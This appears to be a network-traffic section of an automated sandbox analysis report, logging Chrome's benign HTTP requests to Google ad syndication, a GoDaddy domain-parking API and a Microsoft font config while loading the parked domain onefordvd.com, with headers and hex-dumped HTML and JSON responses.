                                                                          2024-08-29 15:12:21 UTC1311OUTGET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=1741724944339990&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944339992&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: iframe
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:22 UTC807INHTTP/1.1 200 OK
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Disposition: inline
                                                                          Date: Thu, 29 Aug 2024 15:12:21 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:21 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-vXe7uCHW6iuElNP7b7BtzA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Server: gws
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2024-08-29 15:12:22 UTC583INData Raw: 33 66 33 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 68 65 61 64 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 73 73 72 2d 62 6f 69 6c 65 72 70 6c 61 74 65 22 3e 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 30 3b 7d 2e 64 69 76 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 20 30 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 7d 2e 73 70 61 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 20 2e 64 69 76 3a 6c 61 73
                                                                          Data Ascii: 3f38<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:las
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 69 5f 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7d 2e 76 5f 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 31 20 30 3b 20 2d 77 65 62 6b 69 74
                                                                          Data Ascii: i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 5f 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7d 2e 6f 5f 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 7d 2e 78 5f 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 7d 2e 79 5f 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 7a 2d 69 6e 64 65 78 3a 31 3b 7d 2e 6b 5f 3e 64 69 76 3a 6e 6f 74 28 2e 79 5f 29 20 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66
                                                                          Data Ascii: _{overflow:hidden;}.o_{white-space:nowrap;}.x_{cursor:pointer;}.y_{display:none; position:absolute; z-index:1;}.k_>div:not(.y_) {display:-webkit-inline-box; display:-moz-inline-box; display:-ms-inline-flexbox; display:-webkit-inline-flex; display:inline-f
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 73 74 61 72 74 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 7d 2e 66 6c 65 78 41 6c 69 67 6e 42 6f 74 74 6f 6d 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 65 6e 64 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 65 6e 64 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 7d 2e 66 6c 65 78 41 6c 69 67 6e 43 65 6e 74 65 72 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72
                                                                          Data Ascii: start; align-items:flex-start;}.flexAlignBottom{-ms-flex-align:end; -webkit-box-align:end; -webkit-align-items:flex-end; align-items:flex-end;}.flexAlignCenter{-ms-flex-align:center; -webkit-box-align:center; -webkit-align-items:center; align-items:center
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 6e 6b 3a 31 3b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 31 3b 7d 2e 73 69 31 30 32 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 77 69 64 74 68 3a 33 32 70 78 3b 7d 2e 73 69 31 33 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 64 32 61 33 33 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 64 64 64 64 64 64 3b 7d 2e 73 69 31 33 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 64 32 61 33 33 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 2e 73 69 31 34 33 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 32 70 78 3b 77 69 64 74 68 3a 32 34 70 78
                                                                          Data Ascii: nk:1; flex-shrink:1;}.si102{border-radius:16px;width:32px;}.si133{background-color:#1d2a33;border-radius:2px;font-size:13px;margin-bottom:5px;margin-left:10px;color:#dddddd;}.si135{background-color:#1d2a33;height:100%;}.si143{border-radius:12px;width:24px
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 5f 20 73 69 31 33 33 20 73 70 61 6e 22 3e 52 65 6c 61 74 65 64 20 73 65 61 72 63 68 65 73 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 65 31 22 20 63 6c 61 73 73 3d 22 69 5f 20 64 69 76 20 63 6c 69 63 6b 74 72 61 63 6b 65 64 41 64 5f 6a 73 20 73 69 31 30 31 22 20 73 74 79 6c 65 3d 22 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69
                                                                          Data Ascii: -webkit-flex-direction:row; flex-direction:row;"><span class="p_ si133 span">Related searches</span></div><div id="e1" class="i_ div clicktrackedAd_js si101" style="-ms-flex-direction:row; -webkit-box-orient:horizontal; -webkit-flex-direction:row; flex-di
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 64 69 76 20 71 5f 20 73 69 31 30 32 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 66 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 64 5f 69 63 6f 6e 73 2f 73 74 61 6e 64 61 72 64 2f 70 75 62 6c 69 73 68 65 72 5f 69 63 6f 6e 5f 69 6d 61 67 65 2f 73 65 61 72 63 68 2e 73 76 67 3f 63 3d 25 32 33 30 66 31 63 32 31 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 5f 20 64 69 76 20 73 69 33 33 22 20 73 74 79 6c 65 3d 22 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 2d 77 65
                                                                          Data Ascii: " tabindex="-1" class="div q_ si102"><img src="https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21" alt="" loading="lazy" class="img"></div></div></div><div class="i_ div si33" style="-ms-flex-direction:row; -we
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 6c 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 22
                                                                          Data Ascii: l; -webkit-flex-direction:row; flex-direction:row;-ms-flex-pack:start; -webkit-box-pack:start; -webkit-justify-content:flex-start; justify-content:flex-start;-ms-flex-align:center; -webkit-box-align:center; -webkit-align-items:center; align-items:center;"
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 22 74 72 75 65 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 64 69 76 20 71 5f 20 73 69 31 34 33 20 77 5f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 66 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 64 5f 69 63 6f 6e 73 2f 73 74 61 6e 64 61 72 64 2f 70 75 62 6c 69 73 68 65 72 5f 69 63 6f 6e 5f 69 6d 61 67 65 2f 63 68 65 76 72 6f 6e 2e 73 76 67 3f 63 3d 25 32 33 30 66 31 63 32 31 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 65 32 22 20 63 6c 61 73 73 3d 22 69 5f 20 64 69 76 20 63 6c 69 63 6b 74 72 61 63 6b 65 64 41 64 5f 6a 73 20 73 69 31 30 31 22 20
                                                                          Data Ascii: "true" tabindex="-1" class="div q_ si143 w_"><img src="https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21" alt="" loading="lazy" class="img"></div></a></div><div id="e2" class="i_ div clicktrackedAd_js si101"
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 6f 6e 3a 72 6f 77 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 22 3e 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 64 69 76 20 71 5f 20 73 69 31 30 32 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 66 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 64 5f 69 63 6f 6e 73 2f 73 74 61 6e 64 61 72 64 2f 70 75 62 6c 69 73 68 65 72 5f 69 63 6f 6e 5f 69 6d 61 67 65 2f 73 65 61 72 63 68 2e 73 76 67 3f 63 3d 25 32 33 30 66 31 63 32 31 22 20 61
                                                                          Data Ascii: on:row; -webkit-box-orient:horizontal; -webkit-flex-direction:row; flex-direction:row;"><div aria-hidden="true" tabindex="-1" class="div q_ si102"><img src="https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21" a


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.55377254.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:21 UTC423OUTGET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:21 UTC731INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:21 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 985
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; Expires=Thu, 05 Sep 2024 15:12:21 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; Expires=Thu, 05 Sep 2024 15:12:21 GMT; Path=/; SameSite=None; Secure
                                                                          cache-control: Private,max-age=86400
                                                                          set-cookie: cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da; Path=/; Expires=Sat, 28 Sep 2024 15:12:21 GMT; Secure; SameSite=None
                                                                          x-request-id: LsC5yTyu
                                                                          2024-08-29 15:12:21 UTC985INData Raw: 7b 22 73 79 73 74 65 6d 22 3a 22 53 4e 22 2c 22 61 63 63 6f 75 6e 74 22 3a 22 31 31 64 31 64 65 66 35 33 34 65 61 31 62 65 30 58 34 33 31 36 32 39 33 66 58 31 35 62 63 62 63 65 35 31 30 62 58 58 32 66 38 65 20 22 2c 22 63 75 73 74 6f 6d 65 72 49 64 22 3a 22 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 64 69 73 70 6c 61 79 54 79 70 65 22 3a 22 41 44 53 22 2c 22 64 61 74 61 53 6f 75 72 63 65 22 3a 22 49 4e 56 45 4e 54 4f 52 59 22 2c 22 61 64 53 65 6e 73 65 22 3a 7b 22 64 72 69 64 22 3a 22 61 73 2d 64 72 69 64 2d 32 34 31 32 37 30 38 38 37 34 33 33 33 35 34 38 22 2c 22 63 68 61 6e 6e 65 6c 22 3a 22 30 36 39 30 32 22 2c 22 70 75 62 49 64 22 3a 22 64 70 2d 6e 61 6d 65 6d 65 64 69 61 30 36
                                                                          Data Ascii: {"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.553773184.28.90.27443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                          Range: bytes=0-2147483646
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-08-29 15:12:22 UTC515INHTTP/1.1 200 OK
                                                                          ApiVersion: Distribute 1.1
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          Content-Type: application/octet-stream
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          Server: ECAcc (lpl/EF06)
                                                                          X-CID: 11
                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                          X-Ms-Region: prod-weu-z1
                                                                          Cache-Control: public, max-age=152624
                                                                          Date: Thu, 29 Aug 2024 15:12:22 GMT
                                                                          Content-Length: 55
                                                                          Connection: close
                                                                          X-CID: 2
                                                                          2024-08-29 15:12:22 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.553774142.250.184.2384434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:22 UTC1311OUTGET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=2721724944340427&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944340430&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: iframe
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:22 UTC807INHTTP/1.1 200 OK
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Disposition: inline
                                                                          Date: Thu, 29 Aug 2024 15:12:22 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:22 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-VLYVxzJZmyy0LjD7iG7q8A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Server: gws
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2024-08-29 15:12:22 UTC583INData Raw: 33 35 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 68 65 61 64 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 73 73 72 2d 62 6f 69 6c 65 72 70 6c 61 74 65 22 3e 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 30 3b 7d 2e 64 69 76 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 20 30 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 7d 2e 73 70 61 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 20 2e 64 69 76 3a 6c 61 73
                                                                          Data Ascii: 351b<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:las
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 69 5f 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7d 2e 76 5f 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 31 20 30 3b 20 2d 77 65 62 6b 69 74
                                                                          Data Ascii: i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit
